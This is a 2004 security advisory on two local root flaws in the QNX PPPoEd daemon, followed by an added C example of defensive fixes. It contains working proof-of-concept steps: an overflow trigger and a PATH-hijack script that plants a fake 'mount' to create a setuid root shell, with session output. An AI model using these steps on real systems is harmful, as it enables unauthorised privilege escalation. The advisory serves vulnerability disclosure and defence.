qnx-pppoed-multiple-flaws.txt

09 Sep 2004 00:00:00, reported by Julio Cesar Fort, source: packetstorm (packetstormsecurity.com)

QNX PPPoEd vulnerabilities allow local root access via buffer overflow and PATH manipulation.

*** rfdslabs security advisory ***
  
Title: QNX PPPoEd local root vulnerabilities [RLSA_01-2004]  
Versions: QNX RTP 6.1 (possibly others)  
Vendor: http://www.qnx.com  
Date: 02 Sep 2004  
  
Author: Julio Cesar Fort <julio at rfdslabs com br>  
  
  
1. Introduction  
  
PPPoEd daemon is used to provide a PPPoE connection, such as DSL, for QNX  
users. More information can be found at QNX Developer Support:  
www.qnx.com/developers/docs/momentics621_docs/neutrino/utilities/p/pppoed.html  
There are two vulnerabilities that can lead to local root access.  
  
2. Details  
  
#1 Buffer overflow  
  
PPPoEd has multiple problems with bounds checking. Almost every flag given an
oversized value crashes PPPoEd, overwriting memory. Since it is suid root by
default, an attacker can execute arbitrary instructions to elevate privileges.
Below is an example that triggers this overflow.
  
$ export overflow256='AAAAAAAAAAAAAAA(...)' (around 256 A's)  
$ /usr/bin/pppoed -F $overflow256  
Memory fault (core dumped)  
$ /usr/bin/pppoed service=$overflow256  
Memory fault (core dumped)  
...  
The same happens with the 'name', 'en', 'upscript', 'downscript', 'retries',
'timeout', 'scriptdetach', 'noscript', 'nodetach', 'remote_mac' and 'local_mac' flags.
  
  
#2 Old $PATH trick  
  
PPPoEd calls "mount -T io-net npm-pppoe.so" without a full path. Anyone who
wants to trick PPPoEd into executing their own malicious code can do so by
modifying $PATH. With this modification, '/usr/sbin/pppoed' will simply execute
'mount' (hostile code) after finding it in the /tmp directory.
Simple proof-of-concept steps are below.
  
$ cd /tmp  
$ cat << _EOF_ > mount  
#!/bin/sh  
cp /bin/sh /tmp/rootshell  
chown root /tmp/rootshell  
chmod 4777 /tmp/rootshell  
echo "Here comes your root shell"  
_EOF_  
  
$ chmod 755 mount  
$ export PATH=/tmp:$PATH  
$ /usr/sbin/pppoed  
$ ls -la /tmp  
-rwxr-xr-x 1 sandimas users 88 Aug 25 2004 mount  
-rwsrwxrwx 1 root 100 153384 Jun 22 2001 /tmp/rootshell  
$ /tmp/rootshell  
Here comes your root shell  
# uname -a  
QNX sandimas 6.1.0 2001/06/25-15:31:48 edt x86pc x86  
#  
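Added example, not part of the advisory: a C sketch of the two defensive checks that close the issues described above, a bounded copy of option values into a fixed buffer, and running the helper only by absolute path with a fixed environment instead of the caller's $PATH. All function names and the OPTION_MAX bound are hypothetical.

```c
/* Added example, not from the advisory: bounded option copying and
 * helper execution by absolute path with a fixed environment. */
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define OPTION_MAX 64   /* hypothetical bound on one option value */

/* Copy an option value into a fixed buffer. Returns 0 on success,
 * -1 if the value (plus its NUL) does not fit, so nothing overflows. */
int copy_option(char *dst, size_t dstsz, const char *src)
{
    const char *end = memchr(src, '\0', dstsz);   /* NUL within dstsz? */
    if (end == NULL)
        return -1;
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* Environment handed to helpers: PATH is fixed, never inherited
 * from the user who started the suid program. */
char *const *privileged_env(void)
{
    static char *const env[] = { "PATH=/bin:/usr/bin:/sbin:/usr/sbin", NULL };
    return env;
}

/* Run a helper by absolute path only. Returns the child's exit status,
 * or -1 if the path is relative (it would be resolved through the
 * caller's $PATH) or the child could not be started. */
int run_helper(const char *path, char *const argv[])
{
    if (path == NULL || path[0] != '/')
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, privileged_env());
        _exit(127);             /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

With these checks, a 256-byte flag value is rejected by copy_option instead of overwriting memory, and run_helper("mount", ...) is refused while run_helper("/bin/mount", ...) runs with a PATH the user cannot influence.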
  
3. Solution  
  
rfdslabs tried to contact QNX Software Systems, but no security staff e-mail
address was found. No solution yet.
  
4. Timeline  
  
27 Aug 2004: Vulnerabilities detected;  
28 Aug - 01 Sep: Looking for QNX security staff contact e-mail: no success;  
02 Sep 2004: Advisory written and sent to security mail-lists.  
  
Thanks to DataStorm Technologies, Lucien Rocha and everyone at rfdslabs.  
  
www.rfdslabs.com.br - computers, sex, human mind and more
Recife, PE, Brazil  
Vulners AI Score: 7.4 (high risk)